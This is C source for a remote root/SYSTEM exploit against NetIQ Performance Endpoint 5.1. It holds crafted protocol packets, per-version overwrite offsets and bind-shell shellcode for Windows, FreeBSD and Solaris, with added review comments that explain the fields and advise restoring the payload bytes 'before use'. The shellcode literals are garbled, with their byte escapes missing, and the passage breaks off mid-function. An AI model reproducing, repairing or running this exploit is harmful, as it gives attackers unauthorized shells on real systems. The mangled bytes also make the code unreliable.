/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000’s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define IPV4_BUFLEN 16 /* "255.255.255.255 " */
#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388
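/*
 * First half of the "setup" request: command byte 0x06 followed by the
 * fixed fields the endpoint parses before the attacker-controlled data.
 *
 * In this copy every byte escape had lost its backslash ("x06" was three
 * ASCII characters instead of one 0x06 byte); the escapes are restored.
 *
 * The 16-bit length prefixes are big-endian and appear to count their own
 * two bytes: 0x22 == 2 + 32 for the copyright string, 0x03 == 2 + 1 for a
 * lone 0xff byte, 0x02 for an empty field.  The author's "len < 0x40" /
 * "len < 0x80" annotations are presumably the server-side bound on each
 * field.  The tail of the request lives in ppkt_buf1_end, presumably so
 * the caller can splice variable-length data between the two halves
 * (the send path is not visible here; confirm before relying on it).
 */
static char ppkt_buf1[] =
  "\x06"                           /* ENDPT_COMMAND_SETUP_E1 */
  "\x07\x14\x43\x1A"               /* verify_get_id (1) */
  "\x00\x22"                       /* copyright_smart_compare: 2 + 32 */
  "Copyright Ganymede Software Inc."
  "\x00\x03"                       /* */
  "\xff"                           /* code_convert_from_line */
  "\x00\x03"                       /* */
  "\xff"                           /* code_convert_from_line */
  "\x00"                           /* */
  "\x00\x02"                       /* len < 0x80 (empty field) */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* len < 0x40 */
  "\x41\x41\x41\x41\x41\x41\x41\x41" /* 16 filler bytes */
  "\x41\x41\x41\x41\x41\x41\x41\x41" /* */
  "\x02"                           /* protocol */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x41\x41\x41\x41\x41\x41"       /* */
  "\x00\x00\x00\x01"               /* */
  "\x00\x00\x00\x02"               /* 218h */
  "\x00"                           /* */
  "\x01"                           /* 1ACh */
  "\x00\x00"                       /* */
  "\x00"                           /* 254h */
  "\x02"                           /* protocol */
  "\x00\x03"                       /* len < 0x40 */
  "\x00";                          /* */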
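/*
 * Trailing fixed fields of the setup request started in ppkt_buf1: four
 * short length-prefixed fields (0x0003 + one byte each) and one bare
 * zero byte.  Byte escapes restored (this copy had lost the backslashes).
 * Presumably appended after the caller's variable-length data; the
 * assembling code is not visible here.
 */
static char ppkt_buf1_end[] =
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00";                          /* */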
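/*
 * Second setup-request variant.  Same command byte, id and copyright
 * check as ppkt_buf1, but the slots the author annotates with offsets
 * (210h, var_C, 218h, 1ACh, 254h) are filled with 0x69 ('i') marker
 * bytes instead of zeros/0x41, and the leading empty field plus the
 * 16+6 byte filler runs are absent.  What the endpoint does with those
 * marker values is not visible here.  Byte escapes restored (this copy
 * had lost the backslashes).
 */
static char ppkt_buf2[] =
  "\x06"                           /* ENDPT_COMMAND_SETUP_E1 */
  "\x07\x14\x43\x1A"               /* verify_get_id (1) */
  "\x00\x22"                       /* copyright_smart_compare: 2 + 32 */
  "Copyright Ganymede Software Inc."
  "\x00\x03"                       /* */
  "\xff"                           /* code_convert_from_line */
  "\x00\x03"                       /* */
  "\xff"                           /* code_convert_from_line */
  "\x02"                           /* protocol */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x69"                           /* 210h */
  "\x00\x00\x00\x69"               /* var_C */
  "\x00\x02"                       /* */
  "\x00\x00\x00\x69"               /* var_C */
  "\x00\x00\x00\x69"               /* 218h */
  "\x69"                           /* */
  "\x01"                           /* 1ACh */
  "\x00\x00"                       /* */
  "\x69"                           /* 254h */
  "\x02"                           /* protocol */
  "\x00\x03"                       /* len < 0x40 */
  "\x00";                          /* */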
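/*
 * Tail of the second setup-request variant: as ppkt_buf1_end, except the
 * bare byte between the length-prefixed fields is the 0x69 marker the
 * author labels 0A8h.  Byte escapes restored (this copy had lost the
 * backslashes).
 */
static char ppkt_buf2_end[] =
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x00\x03"                       /* len < 0x40 */
  "\x00"                           /* */
  "\x69"                           /* 0A8h */
  "\x00\x03"                       /* len < 0x40 */
  "\x00";                          /* */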
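/*
 * Minimal request: command byte 0x07 plus four filler bytes.  Which
 * command 0x07 is on the endpoint is not named in this file.  Byte escape
 * restored (this copy had lost the backslash).
 */
static char cpkt_buf1[] =
  "\x07"
  "AAAA";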
static char cpkt_buf2[] =
"x38"
"x00x04"
"AAAA";
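/*
 * Architecture-specific filler used when laying out the payload (the
 * layout code itself is not visible here).  Byte escapes restored (this
 * copy had lost the backslashes).
 *
 * x86: "adc eax, eax" (11 C0) -- a two-byte instruction whose encoding
 *      also reads as a harmless value if interpreted as a length, hence
 *      the "evil_len" name; single-byte NOP is 0x90.
 * SPARC: "ba" with a +0x3c word displacement (branch always, forward),
 *      and the canonical "sethi 0, %g0" NOP (01 00 00 00).
 */
static char x86_evil_len[] =
  "\x11\xc0";                      /* adc eax, eax */
#define X86_NOP_BYTE 0x90          /* nop */
static char sparc_evil_len[] =
  "\x10\x80\x00\x3c";              /* ba +0x3c */
static char sparc_nop[] =
  "\x01\x00\x00\x00";              /* nop (sethi 0, %g0) */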
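/*
 * 37-byte request: a 00 25 38 header (0x38 is also cpkt_buf2's command
 * byte -- same command, presumably, with different framing), a big-endian
 * length 0x0020 == 32, and exactly 32 zero bytes.  Its use ("hammer"
 * suggests it is sent repeatedly) is not visible here.  Byte escapes
 * restored (this copy had lost the backslashes).
 */
static char hammer_buf[] =
  "\x00\x25\x38"
  "\x00\x20"                       /* 32 == number of zero bytes below */
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00";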
/*
 * win32/x86 bind-shell payload (per its name and the target table that
 * references it).  NOTE(review): every byte escape in this copy has lost
 * its backslash -- as written each "xNN" is three ASCII characters, so
 * this literal is not the intended byte string; restore from the
 * original before use.  The opening bytes (31 c9 83 e9 .. d9 ee d9 74 24
 * f4 5b 81 73 13 ..) look like an fnstenv-based XOR decoder stub, so the
 * listening port is not visible in clear here; presumably PORT_SHELL.
 * The target table sizes it with sizeof, i.e. including the trailing NUL.
 */
static char win32_x86_bind[] =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x8e"
"x2bxb7x2ax83xebxfcxe2xf4x72x41x5cx67x66xd2x48xd5"
"x71x4bx3cx46xaax0fx3cx6fxb2xa0xcbx2fxf6x2ax58xa1"
"xc1x33x3cx75xaex2ax5cx63x05x1fx3cx2bx60x1ax77xb3"
"x22xafx77x5ex89xeax7dx27x8fxe9x5cxdexb5x7fx93x02"
"xfbxcex3cx75xaax2ax5cx4cx05x27xfcxa1xd1x37xb6xc1"
"x8dx07x3cxa3xe2x0fxabx4bx4dx1ax6cx4ex05x68x87xa1"
"xcex27x3cx5ax92x86x3cx6ax86x75xdfxa4xc0x25x5bx7a"
"x71xfdxd1x79xe8x43x84x18xe6x5cxc4x18xd1x7fx48xfa"
"xe6xe0x5axd6xb5x7bx48xfcxd1xa2x52x4cx0fxc6xbfx28"
"xdbx41xb5xd5x5ex43x6ex23x7bx86xe0xd5x58x78xe4x79"
"xddx78xf4x79xcdx78x48xfaxe8x43x90x3axe8x78x3excb"
"x1bx43x13x30xfexecxe0xd5x58x41xa7x7bxdbxd4x67x42"
"x2ax86x99xc3xd9xd4x61x79xdbxd4x67x42x6bx62x31x63"
"xd9xd4x61x7axdax7fxe2xd5x5exb8xdfxcdxf7xedxcex7d"
"x71xfdxe2xd5x5ex4dxddx4exe8x43xd4x47x07xcexddx7a"
"xd7x02x7bxa3x69x41xf3xa3x6cx1ax77xd9x24xd5xf5x07"
"x70x69x9bxb9x03x51x8fx81x25x80xdfx58x70x98xa1xd5"
"xfbx6fx48xfcxd5x7cxe5x7bxdfx7axddx2bxdfx7axe2x7b"
"x71xfbxdfx87x57x2ex79x79x71xfdxddxd5x71x1cx48xfa"
"x05x7cx4bxa9x4ax4fx48xfcxdcxd4x67x42x61xe5x57x4a"
"xddxd4x61xd5x5ex2bxb7x2a";
/*
 * FreeBSD/x86 bind-shell payload.  NOTE(review): byte escapes have lost
 * their backslashes in this copy (see win32_x86_bind); not usable as
 * written.  Unencoded: the pushed sockaddr bytes 10 02 27 10 read as
 * sin_len=16, sin_family=2 (AF_INET), port 0x2710 == 10000 == PORT_SHELL,
 * and it ends with an execve (b0 3b) of "/bin//sh" (2f 2f 73 68 / 2f 62
 * 69 6e).  Sized with sizeof in the target table (trailing NUL included).
 */
static char freebsd_x86_bind[] =
"x6ax61x58x99x52x68x10x02x27x10x89xe1x52x42x52x42"
"x52x6ax10xcdx80x99x93x51x53x52x6ax68x58xcdx80xb0"
"x6axcdx80x52x53x52xb0x1excdx80x97x6ax02x59x6ax5a"
"x58x51x57x51xcdx80x49x79xf5x50x68x2fx2fx73x68x68"
"x2fx62x69x6ex89xe3x50x54x53x53xb0x3bxcdx80";
/*
 * Solaris/SPARC bind-shell payload.  NOTE(review): byte escapes have lost
 * their backslashes in this copy (see win32_x86_bind); not usable as
 * written.  Syscalls appear to go through "ta 8" (91 d0 20 08); the
 * sethi/or pair 21 00 00 89 / a0 14 23 10 builds 0x00022710, i.e.
 * AF_INET with port 0x2710 == 10000 == PORT_SHELL -- consistent with the
 * other payloads, but verify.  Sized with sizeof in the target table.
 */
static char solaris_sparc_bind[] =
"x9cx2bxa0x07x98x10x20x01x96x1axc0x0bx94x1axc0x0b"
"x92x10x20x02x90x10x20x02x82x10x20xe6x91xd0x20x08"
"xd0x23xbfxf8x21x00x00x89xa0x14x23x10xe0x23xbfxf0"
"xc0x23xbfxf4x92x23xa0x10x94x10x20x10x82x10x20xe8"
"x91xd0x20x08xd0x03xbfxf8x92x10x20x01x82x10x20xe9"
"x91xd0x20x08xd0x03xbfxf8x92x1ax40x09x94x12x40x09"
"x82x10x20xeax91xd0x20x08xd0x23xbfxf8x94x10x20x03"
"x92x10x20x09x94xa2xa0x01x82x10x20x3ex91xd0x20x08"
"x12xbfxffxfcxd0x03xbfxf8x94x1axc0x0bx21x0bxd8x9a"
"xa0x14x21x6ex23x0bxdcxdax90x23xa0x10x92x23xa0x08"
"xe0x3bxbfxf0xd0x23xbfxf8xc0x23xbfxfcx82x10x20x3b"
"x91xd0x20x08";
/*
 * Solaris/x86 bind-shell payload.  NOTE(review): byte escapes have lost
 * their backslashes in this copy (see win32_x86_bind); not usable as
 * written.  Syscalls go via "int 0x91" (cd 91); the sockaddr is built by
 * NOT-ing 0xefd8fffd into 0x10270002 (AF_INET, port 0x2710 == 10000 ==
 * PORT_SHELL), and it ends with execve (b0 3b) of "/bin//sh".  Sized with
 * sizeof in the target table (trailing NUL included).
 */
static char solaris_x86_bind[] =
"xb8xffxffxffxffxbaxfdxffxd8xefxf7xd0xf7xd2x50x52"
"x89xe7x31xdbxf7xe3xb0x02x50x52x52x50x50x50xb0xe6"
"xcdx91x93x6ax10x57x53x52xb0xe8xcdx91x52x53x52xb0"
"xe9xcdx91x52x53x6ax02xb0xeaxcdx91x93x92x99x59x51"
"x52xb0x06xcdx91x51x6ax09x53x52xb0x3excdx91x83xc4"
"x18x49x79xebx52x68x2fx2fx73x68x68x2fx62x69x6ex89"
"xe3x52x53x89xe1x52x52x51x53x52xb0x3bxcdx91";
#define NUM_TARGETS 7              /* populated rows in targets[] (excludes the {0} terminator) */
#define ARCH_X86 0
#define ARCH_SPARC 1

/*
 * One row per supported build of the endpoint.  The field order is part of
 * the interface: positional code elsewhere may depend on it, so do not
 * reorder.
 */
struct target_t
{
  const char *name;                /* label shown when listing/selecting targets */
  const char *zshell;              /* bind-shell payload for this platform */
  const int zshell_len;            /* sizeof the payload array, so it includes the trailing NUL */
  const int zshell_pkt_len;        /* size the payload packet is built to; stays below ENDPT_PKTMAX (0x1388) */
  const int fp_indx;               /* index and byte offset of the pointer slot that gets overwritten -- */
  const int fp_offset;             /*   exact semantics live in the (not visible) packet builder */
  const int arch;                  /* ARCH_X86 / ARCH_SPARC: selects the filler/branch bytes above, presumably */
};

/*
 * The three 5.1.15xxx Windows builds differ only in fp_offset (0x490 is
 * shared by 15750 and 15541); the Unix rows share fp_indx 29.
 */
struct target_t targets[] = {
  { .name = "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
    .zshell = win32_x86_bind, .zshell_len = sizeof win32_x86_bind,
    .zshell_pkt_len = 0x11c0, .fp_indx = 33, .fp_offset = 0x490, .arch = ARCH_X86 },
  { .name = "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
    .zshell = win32_x86_bind, .zshell_len = sizeof win32_x86_bind,
    .zshell_pkt_len = 0x11c0, .fp_indx = 33, .fp_offset = 0x490, .arch = ARCH_X86 },
  { .name = "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
    .zshell = win32_x86_bind, .zshell_len = sizeof win32_x86_bind,
    .zshell_pkt_len = 0x11c0, .fp_indx = 33, .fp_offset = 0x488, .arch = ARCH_X86 },
  { .name = "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
    .zshell = win32_x86_bind, .zshell_len = sizeof win32_x86_bind,
    .zshell_pkt_len = 0x11c0, .fp_indx = 33, .fp_offset = 0x480, .arch = ARCH_X86 },
  { .name = "NetIQ Endpoint 5.1 - FreeBSD (universal)",
    .zshell = freebsd_x86_bind, .zshell_len = sizeof freebsd_x86_bind,
    .zshell_pkt_len = 0x11c0, .fp_indx = 29, .fp_offset = 0x3FC, .arch = ARCH_X86 },
  { .name = "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
    .zshell = solaris_sparc_bind, .zshell_len = sizeof solaris_sparc_bind,
    .zshell_pkt_len = 0x1080, .fp_indx = 29, .fp_offset = 0x400, .arch = ARCH_SPARC },
  { .name = "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
    .zshell = solaris_x86_bind, .zshell_len = sizeof solaris_x86_bind,
    .zshell_pkt_len = 0x11c0, .fp_indx = 29, .fp_offset = 0x400, .arch = ARCH_X86 },
  {0}                              /* terminator: name == NULL */
};
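/*
 * The vendor's two assurances, reproduced from the file header (presumably
 * printed by the exploit's banner; the caller is not visible here).  In
 * this copy the \" and \n escapes had lost their backslashes, leaving raw
 * newlines and unbalanced quotes inside the literals -- which does not
 * compile.  Restored as two strings, each spanning adjacent literals.
 */
static const char *quotes[] = {
  " \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
  " to do something like 'run this command.' 100,000’s of endpoints have been\n"
  " installed worldwide without incident.\"",
  " \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
  " susceptible to 'buffer overrun' attacks used by hackers.\""
};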
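static int verbose = 1;            /* verbosity; non-zero presumably enables progress output */
static int ppid, cpid;             /* parent and child process id's */

/*
 * Forward declarations.  Parameter names are given so the prototypes
 * document the contract: every socket helper takes a connected fd, a
 * buffer and its length; sock_recv_str additionally NUL-terminates.
 */
static int get_localip_getifaddrs (in_addr_t *ip_addr);
static int sock_send (int fd, char *src, int len);
static int sock_recv (int fd, char *dst, int len);
static int sock_recv_str (int fd, char *dst, int len);
static void shellami (int fd);     /* interactive shell relay on fd, presumably -- definition not visible here */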
/*
 * Abort the whole run.  kill(0, ...) targets every process in the caller's
 * process group, which here presumably means the forked parent/child pair
 * (ppid/cpid above); SIGKILL cannot be caught, so the exit() that follows
 * is only reached if the signal somehow did not deliver to ourselves.
 */
static void
fatal (void)
{
  (void) kill (0, SIGKILL);
  exit (EXIT_FAILURE);
}
/*
 * Find a local IPv4 address to hand to the target (for a bind/connect-back
 * path, presumably).  Takes the FIRST interface that is up, AF_INET and not
 * loopback; on a multi-homed host that is not necessarily the interface
 * that can reach the target.
 *
 * On success writes the address (network byte order, as held in sin_addr)
 * to *ip_addr and returns 0.  Returns -1 if getifaddrs() fails or no
 * interface qualifies; *ip_addr is untouched in that case.
 */
static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
  struct ifaddrs *list, *ifa;
  int found = 0;

  if (getifaddrs (&list) != 0)
    return (-1);

  for (ifa = list; ifa != NULL && !found; ifa = ifa->ifa_next)
    {
      const struct sockaddr_in *sin;

      if (ifa->ifa_name == NULL || ifa->ifa_addr == NULL)
        continue;
      if (ifa->ifa_addr->sa_family != AF_INET)
        continue;
      if (!(ifa->ifa_flags & IFF_UP) || (ifa->ifa_flags & IFF_LOOPBACK))
        continue;

      sin = (const struct sockaddr_in *) ifa->ifa_addr;
      memcpy (ip_addr, &sin->sin_addr, sizeof *ip_addr);
      found = 1;
    }

  freeifaddrs (list);
  return (found ? 0 : -1);
}
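/*
 * Write exactly LEN bytes from SRC to the connected stream socket FD.
 *
 * send() may legitimately accept fewer bytes than asked for; the previous
 * version returned that short count and callers did not re-send, which on
 * a length-prefixed protocol leaves the stream mis-framed.  This version
 * loops until everything is out (or the peer stops accepting), so the
 * return value equals LEN on success and callers may keep ignoring it.
 *
 * A send() error is reported with perror() and terminates the process,
 * as before.  A negative LEN is rejected the same way instead of being
 * converted to a huge size_t.
 */
static int
sock_send (int fd, char *src, int len)
{
  int sent = 0;

  if (len < 0)
    {
      fprintf (stderr, "send(): negative length\n");
      exit (EXIT_FAILURE);
    }

  while (sent < len)
    {
      ssize_t n = send (fd, src + sent, (size_t) (len - sent), 0);

      if (n < 0)
        {
          perror ("send()");
          exit (EXIT_FAILURE);
        }
      if (n == 0)
        break;                     /* nothing accepted; do not spin */
      sent += (int) n;
    }

  return (sent);
}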
/*
 * Read up to LEN bytes from the connected socket FD into DST.
 *
 * Returns whatever recv() delivered: the byte count, or 0 when the peer
 * has closed (callers must handle 0; sock_recv_str relies on it to place
 * the terminator).  LEN must be the real capacity of DST -- nothing here
 * checks it.  A recv() error is reported with perror() and terminates the
 * process.
 */
static int
sock_recv (int fd, char *dst, int len)
{
  ssize_t got = recv (fd, dst, (size_t) len, 0);

  if (got < 0)
    {
      perror ("recv()");
      exit (EXIT_FAILURE);
    }

  return ((int) got);
}
static int
sock_recv_str (int fd, char *dst, int len)
{
int n = sock_recv (fd, dst, len - 1);
dst[n] = '